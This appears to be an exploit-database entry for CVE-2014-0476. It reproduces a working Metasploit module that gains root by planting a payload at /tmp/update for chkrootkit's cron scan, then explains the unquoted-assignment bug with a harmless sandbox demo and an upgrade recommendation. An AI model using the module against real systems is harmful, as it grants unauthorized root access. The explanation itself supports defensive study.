Chkrootkit Local Privilege Escalation

Reported 18 Nov 2015 18:50:57 by Thomas Stangner, Julien "jvoisin" Voisin
Type: metasploit
Source: www.rapid7.com

Chkrootkit Local Privilege Escalation. Chkrootkit before 0.50 runs any executable file named /tmp/update as root, so an unprivileged local user who can write that file gets a trivial privilege escalation. The module drops its payload there and waits for the next scheduled scan; WfsDelay is set to 24h because that is the default interval of the chkrootkit cron job.

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local

  # This could also be Excellent, but since it requires
  # up to one day to pop a shell, let's set it to Manual instead.
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chkrootkit Local Privilege Escalation',
        'Description' => %q{
          Chkrootkit before 0.50 will run any executable file named /tmp/update
          as root, allowing a trivial privilege escalation.

          WfsDelay is set to 24h, since this is how often a chkrootkit scan is
          scheduled by default.
        },
        'Author' => [
          'Thomas Stangner', # Original exploit
          'Julien "jvoisin" Voisin' # Metasploit module
        ],
        'References' => [
          ['CVE', '2014-0476'],
          ['OSVDB', '107710'],
          ['EDB', '33899'],
          ['BID', '67813'],
          ['URL', 'https://seclists.org/oss-sec/2014/q2/430']
        ],
        'DisclosureDate' => '2014-06-04',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'SessionTypes' => ['shell', 'meterpreter'],
        'Privileged' => true,
        'Stance' => Msf::Exploit::Stance::Passive,
        'Targets' => [['Automatic', {}]],
        'DefaultTarget' => 0,
        'DefaultOptions' => { 'WfsDelay' => 24.hours.seconds.to_i },
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
    ])
  end

  def check
    version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")

    if version =~ /chkrootkit version 0\.[1-4]/
      CheckCode::Appears
    else
      CheckCode::Safe
    end
  end

  def exploit
    print_warning('Rooting depends on the crontab (this could take a while)')

    write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
    cmd_exec('chmod +x /tmp/update')
    register_file_for_cleanup('/tmp/update')

    print_status('Payload written to /tmp/update')
    print_status('Waiting for chkrootkit to run via cron...')
  end
end
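The module above only plants the file; the reason chkrootkit runs it is a shell quoting mistake. The published root cause for CVE-2014-0476 is a line of the form `file_port=$file_port $i` in chkrootkit's slapper() check, where `$i` iterates over suspicious paths that include /tmp/update. Because the right-hand side is unquoted, the shell does not treat that line as an assignment: it runs `$i` with `file_port` set only in that command's environment. The script below is an added example, not code from the Metasploit module or from chkrootkit. It reproduces the vulnerable pattern beside the quoted fix inside a throwaway directory (`$TMPDIR` or /tmp, an assumption) with a harmless stand-in for /tmp/update that merely drops a marker file, so the effect can be observed without touching the real /tmp.

```shell
#!/bin/sh
# Added example, not part of the Metasploit module or of chkrootkit itself.
# Reproduces the shell pitfall behind CVE-2014-0476 in a sandbox directory:
# `var=$var $i` is parsed as "run $i with var in its environment", not as an
# assignment. The sandbox path and the file names are assumptions for the demo.

SANDBOX="${TMPDIR:-/tmp}/chkrootkit-demo.$$"

# Stand-in for the attacker's /tmp/update: harmless, only creates a marker.
setup_sandbox() {
    mkdir -p "$SANDBOX"
    printf '#!/bin/sh\ntouch "%s/marker"\n' "$SANDBOX" > "$SANDBOX/update"
    chmod 755 "$SANDBOX/update"
    rm -f "$SANDBOX/marker"
}

# Returns 0 if the stand-in was executed (marker exists), 1 otherwise.
marker_executed() {
    [ -f "$SANDBOX/marker" ]
}

# Vulnerable pattern. The unquoted `file_port=$file_port $i` is a command
# invocation with a temporary environment assignment: $i is executed, and
# file_port is never actually updated, so the hit list stays empty.
vulnerable_scan() {
    file_port=""
    for i in "$SANDBOX/update" "$SANDBOX/.bugtraq" "$SANDBOX/httpd"; do
        if [ -f "$i" ]; then
            file_port=$file_port $i
        fi
    done
    printf '%s\n' "$file_port"
}

# Fixed pattern. Quoting the right-hand side makes it a plain assignment:
# the list of hits is accumulated and nothing is executed.
fixed_scan() {
    file_port=""
    for i in "$SANDBOX/update" "$SANDBOX/.bugtraq" "$SANDBOX/httpd"; do
        if [ -f "$i" ]; then
            file_port="$file_port $i"
        fi
    done
    printf '%s\n' "$file_port"
}

cleanup_sandbox() {
    rm -rf "$SANDBOX"
}

# Run both variants and report whether the stand-in for /tmp/update ran.
demo() {
    setup_sandbox
    echo "vulnerable_scan reported: '$(vulnerable_scan)'"
    if marker_executed; then
        echo "  -> stand-in for /tmp/update WAS executed"
    fi
    rm -f "$SANDBOX/marker"
    echo "fixed_scan reported: '$(fixed_scan)'"
    if marker_executed; then
        echo "  -> stand-in executed"
    else
        echo "  -> nothing executed, hit list built instead"
    fi
    cleanup_sandbox
}

if [ "${1:-}" = "demo" ]; then
    demo
fi
```

Run it as `sh demo.sh demo`. The vulnerable variant reports an empty hit list yet leaves the marker behind, which is exactly the combination that made the real bug both exploitable and silent: the scan still "worked" from the operator's point of view. The defensive takeaway for anything that runs as root from cron is the same as the module's check implies: upgrade to chkrootkit 0.50 or later, and treat any script that builds lists from attacker-controllable paths without quoting as a code-execution sink.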
